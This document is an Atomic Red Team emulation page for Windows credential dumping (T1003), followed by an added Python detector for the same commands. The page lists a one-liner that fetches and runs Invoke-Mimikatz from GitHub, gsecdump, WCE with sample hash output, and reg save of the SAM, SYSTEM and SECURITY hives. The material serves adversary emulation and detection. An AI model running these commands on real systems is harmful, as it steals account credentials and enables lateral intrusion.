atomic-red-team/Windows/Credential_Access/Credential_Dumping.md
2018-03-21 14:13:10 -04:00
Credential Dumping

MITRE ATT&CK Technique: T1003

PowerShell Mimikatz

Input:

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Gsecdump

Input:

gsecdump -a

Windows Credential Editor

Input:

wce -o output.txt

Output:

C:\>wce -o output.txt
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

C:\>type output.txt
test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102
C:\>

Registry

The local SAM (needs the SAM and SYSTEM hives), cached domain credentials (SYSTEM and SECURITY hives) and LSA secrets (SYSTEM and SECURITY hives) can be extracted offline by saving three registry hives with reg.exe:

Input:

reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security

Output:

C:\>reg save HKLM\sam sam
The operation completed successfully.

The saved hive files can then be processed offline using creddump7.
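The commands above are the attack side of T1003; the defender's counterpart is a detection over process-creation telemetry. The following is an added example written for this page, not code from the Atomic Red Team project: it parses a few constructed, pipe-delimited process-creation records (timestamp, event id, user, image, command line, loosely modelled on Windows Security Event 4688 / Sysmon Event 1 fields) and flags command lines matching each technique listed above. It also correlates `reg save` events per user so that a save of all three credential hives (SAM, SYSTEM, SECURITY) is reported as a single higher-confidence finding rather than three isolated ones. The log format, user names, paths and URL are all constructed for the example.

```python
"""Detect the T1003 credential-dumping commands from the page in process-creation logs.

Added example, not part of the Atomic Red Team page. The log format below is
constructed: timestamp|event_id|user|image|command_line (command line last, so a
'|' inside a PowerShell pipeline does not break parsing).
"""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional, Set, Tuple


class ProcessEvent(NamedTuple):
    timestamp: str
    event_id: str
    user: str
    image: str
    command_line: str


class Finding(NamedTuple):
    technique: str
    user: str
    command_line: str


# Detection rules keyed to the techniques on the page. Case-insensitive because
# cmd.exe and PowerShell are. Each regex is applied to the full command line only.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("PowerShell Mimikatz (Invoke-Mimikatz / -DumpCreds)",
     re.compile(r"invoke-mimikatz|-dumpcreds\b", re.I)),
    ("gsecdump",
     re.compile(r"(?:^|[\\\s\"'])gsecdump(?:\.exe)?\b", re.I)),
    ("Windows Credential Editor (wce)",
     re.compile(r"(?:^|[\\\s\"'])wce(?:\.exe)?\b", re.I)),
    ("reg save of SAM/SYSTEM/SECURITY hive",
     re.compile(r"\breg(?:\.exe)?\s+save\s+[\"']?(?:HKLM|HKEY_LOCAL_MACHINE)\\(sam|system|security)\b", re.I)),
]
HIVE_RULE = RULES[3][1]                      # reused for per-user correlation
CREDENTIAL_HIVES: Set[str] = {"sam", "system", "security"}

# Constructed sample telemetry (hypothetical hosts, users and URL).
SAMPLE_LOG: List[str] = [
    r"2024-01-15T10:01:02Z|4688|CORP\alice|C:\Windows\System32\reg.exe|reg save HKLM\sam sam",
    r"2024-01-15T10:01:05Z|4688|CORP\alice|C:\Windows\System32\reg.exe|reg save HKLM\system system",
    r"2024-01-15T10:01:09Z|4688|CORP\alice|C:\Windows\System32\reg.exe|reg save HKLM\security security",
    r'''2024-01-15T10:07:41Z|4688|CORP\bob|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://placeholder.invalid/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"''',
    r"2024-01-15T10:12:00Z|4688|CORP\svc_backup|C:\Windows\System32\reg.exe|reg save HKLM\SOFTWARE\Contoso backup.hiv",
    r"2024-01-15T10:15:33Z|4688|CORP\carol|C:\Tools\wce.exe|wce -o output.txt",
    r"2024-01-15T10:16:10Z|4688|CORP\dave|C:\Tools\gsecdump.exe|gsecdump -a",
    r"2024-01-15T10:20:00Z|4688|CORP\erin|C:\Windows\System32\cmd.exe|cmd /c type output.txt",
]


def parse_event(line: str) -> Optional[ProcessEvent]:
    """Split one record into fields; return None for malformed lines."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None
    return ProcessEvent(*parts)


def match_rules(event: ProcessEvent) -> List[Finding]:
    """Return one Finding per rule whose pattern occurs in the command line."""
    return [Finding(name, event.user, event.command_line)
            for name, pattern in RULES if pattern.search(event.command_line)]


def saved_hives_by_user(events: List[ProcessEvent]) -> Dict[str, Set[str]]:
    """Map user -> set of credential hives that user saved with reg.exe."""
    hives: Dict[str, Set[str]] = defaultdict(set)
    for ev in events:
        m = HIVE_RULE.search(ev.command_line)
        if m:
            hives[ev.user].add(m.group(1).lower())
    return dict(hives)


def analyse(lines: List[str]) -> Tuple[List[Finding], List[str]]:
    """Run all rules and the hive correlation over raw log lines.

    Returns (per-event findings, users who saved all of SAM, SYSTEM and SECURITY).
    """
    events = [e for e in map(parse_event, lines) if e is not None]
    findings = [f for ev in events for f in match_rules(ev)]
    full_dump_users = sorted(u for u, h in saved_hives_by_user(events).items()
                             if h >= CREDENTIAL_HIVES)
    return findings, full_dump_users


if __name__ == "__main__":
    found, full_dump = analyse(SAMPLE_LOG)
    for f in found:
        print(f"[{f.technique}] user={f.user} cmd={f.command_line}")
    for user in full_dump:
        print(f"[HIGH] {user} saved all three credential hives (offline SAM/LSA dump)")
```

The per-event rules are deliberately narrow (process name plus the argument the page shows) to keep false positives low; the `reg save` rule only fires on the three credential hives, so a backup job saving `HKLM\SOFTWARE` is not flagged. The hive correlation is the part worth keeping in a real pipeline: a single `reg save HKLM\system` has legitimate uses, but the same user saving all three hives in a short window is the exact pattern this test exercises.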